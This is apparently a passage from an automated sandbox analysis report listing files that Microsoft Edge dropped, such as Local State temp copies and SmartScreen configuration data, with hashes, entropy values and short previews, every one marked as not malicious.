                                                                                                                                                                                                                                                                  SHA-256:9221B31FD33C972166CDA29BE37D6DE3EB5CE606EDF4EC309F2DE1A78A09AFCF
                                                                                                                                                                                                                                                                  SHA-512:48DFF35333ACEFD29420D3344F4CFF93A48204548284DF3503C3DB7F17E9869581C24C2DB10DF2646B1AC7383057B21C3BF6E2CB7D9B1B1F7B00B1828FAF8E63
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3c7f4.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                                                                  Entropy (8bit):6.089783421352068
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWvdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5EkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                  MD5:1716B7F7F23A5073C1EAF40BD983FF39
                                                                                                                                                                                                                                                                  SHA1:D39AEC898E96949C275407978EF19AAE48116E08
                                                                                                                                                                                                                                                                  SHA-256:9221B31FD33C972166CDA29BE37D6DE3EB5CE606EDF4EC309F2DE1A78A09AFCF
                                                                                                                                                                                                                                                                  SHA-512:48DFF35333ACEFD29420D3344F4CFF93A48204548284DF3503C3DB7F17E9869581C24C2DB10DF2646B1AC7383057B21C3BF6E2CB7D9B1B1F7B00B1828FAF8E63
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3c90e.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                                                                  Entropy (8bit):6.089783421352068
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWvdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5EkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                  MD5:1716B7F7F23A5073C1EAF40BD983FF39
                                                                                                                                                                                                                                                                  SHA1:D39AEC898E96949C275407978EF19AAE48116E08
                                                                                                                                                                                                                                                                  SHA-256:9221B31FD33C972166CDA29BE37D6DE3EB5CE606EDF4EC309F2DE1A78A09AFCF
                                                                                                                                                                                                                                                                  SHA-512:48DFF35333ACEFD29420D3344F4CFF93A48204548284DF3503C3DB7F17E9869581C24C2DB10DF2646B1AC7383057B21C3BF6E2CB7D9B1B1F7B00B1828FAF8E63
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3ed9d.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                                                                  Entropy (8bit):6.089783421352068
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWvdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5EkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                  MD5:1716B7F7F23A5073C1EAF40BD983FF39
                                                                                                                                                                                                                                                                  SHA1:D39AEC898E96949C275407978EF19AAE48116E08
                                                                                                                                                                                                                                                                  SHA-256:9221B31FD33C972166CDA29BE37D6DE3EB5CE606EDF4EC309F2DE1A78A09AFCF
                                                                                                                                                                                                                                                                  SHA-512:48DFF35333ACEFD29420D3344F4CFF93A48204548284DF3503C3DB7F17E9869581C24C2DB10DF2646B1AC7383057B21C3BF6E2CB7D9B1B1F7B00B1828FAF8E63
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4a082.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                                                                  Entropy (8bit):6.089783421352068
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWvdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5EkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                  MD5:1716B7F7F23A5073C1EAF40BD983FF39
                                                                                                                                                                                                                                                                  SHA1:D39AEC898E96949C275407978EF19AAE48116E08
                                                                                                                                                                                                                                                                  SHA-256:9221B31FD33C972166CDA29BE37D6DE3EB5CE606EDF4EC309F2DE1A78A09AFCF
                                                                                                                                                                                                                                                                  SHA-512:48DFF35333ACEFD29420D3344F4CFF93A48204548284DF3503C3DB7F17E9869581C24C2DB10DF2646B1AC7383057B21C3BF6E2CB7D9B1B1F7B00B1828FAF8E63
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF500d2.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                                                                  Entropy (8bit):6.089783421352068
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWvdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5EkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                  MD5:1716B7F7F23A5073C1EAF40BD983FF39
                                                                                                                                                                                                                                                                  SHA1:D39AEC898E96949C275407978EF19AAE48116E08
                                                                                                                                                                                                                                                                  SHA-256:9221B31FD33C972166CDA29BE37D6DE3EB5CE606EDF4EC309F2DE1A78A09AFCF
                                                                                                                                                                                                                                                                  SHA-512:48DFF35333ACEFD29420D3344F4CFF93A48204548284DF3503C3DB7F17E9869581C24C2DB10DF2646B1AC7383057B21C3BF6E2CB7D9B1B1F7B00B1828FAF8E63
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                                                                                                  Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                  MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                  SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                  SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                  SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                                                                  Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                  MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                  SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                  SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                  SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                                                                                                                  Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                  MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                  SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                  SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                  SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):130439
                                                                                                                                                                                                                                                                  Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                  MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                  SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                  SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                  SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                  Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                  MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                  SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                  SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                  SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):57
                                                                                                                                                                                                                                                                  Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                  MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                  SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                  SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                  SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                  Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                  MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                  SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                  SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                  SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):575056
                                                                                                                                                                                                                                                                  Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                  MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                  SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                  SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                  SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                  Malicious:false
